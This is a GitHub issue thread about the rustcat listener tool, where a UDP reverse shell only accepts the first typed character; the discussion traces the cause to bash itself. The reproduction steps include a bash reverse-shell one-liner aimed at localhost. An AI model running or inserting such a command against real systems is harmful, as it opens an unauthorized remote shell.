### ISSUE TITLE
UDP shell only recognises 1st input character

### ISSUE THREAD

**Issue by Kibouo** [robiot/rustcat#23]
### ISSUE TYPE:
 - Bug Report

#### OS / ENVIRONMENT:
- Operating system:  `5.14.5-arch1-1`
- Rustcat version: `rustcat 1.2.0`

#### STEPS TO REPRODUCE:
1. (client) `rc -ul localhost 1337`
2. (target) `bash -c 'bash -i >& /dev/udp/localhost/1337 0>&1'`
3. (client) 
    - type command & press enter
    - notice `>>` prompt with 
        - only 1st typed character being repeated
        - command not being executed

#### EXPECTED BEHAVIOUR:
Normal shell behavior we all know.

#### ACTUAL BEHAVIOUR:
The 1st typed character is being "locked in". Meaning, to actually execute a command (e.g. `pwd`) one must:
1. type 1st char (`p`) and enter
2. type 2nd char (`w`) and enter
3. type 3rd char (`d`) and enter
4. enter to send the *actual* enter

![image](https://user-images.githubusercontent.com/25766329/133946458-3bde1a55-404f-48a3-b341-c1f0a2b9cc03.png)

**Comment by robiot** [comment]
Good report! Yeah the udp is a little bit weird at the moment. And I will try to fix it as soon as I got the time for it :)

**Comment by Kibouo** [comment]
Had a look at this today. It is *not* a problem with the implementation! Instead, it seems to be a problem with `bash` itself.

[This SO response](https://stackoverflow.com/questions/28424224/reverse-shell-using-netcat-and-udp-is-not-working) explains  (not sourced sadly) that bash handles UDP file descriptors "wrong" by reading only 1 byte. 

Testing confirms this: `Ncat 7.92` as listener behaves the same as `rustcat`.

`GNU Netcat 0.7.1` "fixes" this by silently refuses the connection. :upside_down_face: I'll just close this issue :sweat_smile:
